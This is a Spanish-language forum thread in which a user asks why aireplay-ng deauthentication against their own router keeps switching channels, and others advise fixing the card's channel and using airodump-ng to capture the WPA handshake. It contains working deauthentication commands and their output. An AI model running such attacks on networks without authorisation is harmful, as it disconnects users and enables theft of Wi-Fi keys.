Buenas estoy intentando sacar la KEY de mi router, y nunca consigo el handshake pero eso es tema aparte... la cosa es que al hacer el ataque A0 con:
aireplay-ng -0 50 -a --:--:--:--:--:-- -c --:--:--:--:--:-- wlan0
pues tengo el problema que especifico el canal donde se encuentra la victima y esta todo el rato probando canales diferentes, y tengo que ir probando hasta que coincidia. Por ejemplo:
wifiway ~ # aireplay-ng -0 50 -a --:--:--:--:-- -c --:--:--:--:--:-- wlan0
16:26:28 Waiting for beacon frame (BSSID: .....) on channel 2
16:26:28 wlan0 is on channel 2, but the AP uses channel 4
wifiway ~ # aireplay-ng -0 50 -a ..... -c ..... wlan0
16:26:29 Waiting for beacon frame (BSSID: ......) on channel 6
16:26:29 wlan0 is on channel 6, but the AP uses channel 4
wifiway ~ # aireplay-ng -0 50 -a ..... -c .... wlan0
16:26:30 Waiting for beacon frame (BSSID: ....) on channel 4
16:26:30 Sending 64 directed DeAuth. STMAC: [....] [ 0| 1 ACKs]
16:26:31 Sending 64 directed DeAuth. STMAC: [...] [ 0| 0 ACKs]
16:26:32 Sending 64 directed DeAuth. STMAC: [...] [ 0| 0 ACKs]
16:26:33 Sending 64 directed DeAuth. STMAC: [...] [ 0| 0 ACKs]
16:26:34 Sending 64 directed DeAuth. STMAC: [...] [ 0| 0 ACKs]
En ningún manual he visto comentado esto, así que supongo que algo estaré haciendo mal...
Gracias
antes de realizar A0 debes poner tu tarjeta en el canal adecuado y lanzar airodump-ng para la captura del handshake.
Puedes hacerlo con iwconfig o con airmon-ng.
Saludos
Vale muchas gracias. Pero me han entrado dudas porque yo esto nunca lo hacia, osea ponerlo en modo monitor para un canal, yo creo que lo tengo puesto para todos los canales, entonces cuando estoy haciendo una auditoria sobre una determinada red (digamos inyectando paquetes o cualquier otra cosa por el estilo),¿es mejor ponerlo para el canal especifico por que ira más rápido?
Cita de: pasteles en 16 Agosto 2010, 19:57 PM¿es mejor ponerlo para el canal especifico por que ira más rápido?
Evidentemente, yo casi diría imprescindible sino va lentísimo.
Un saludo ::) ::)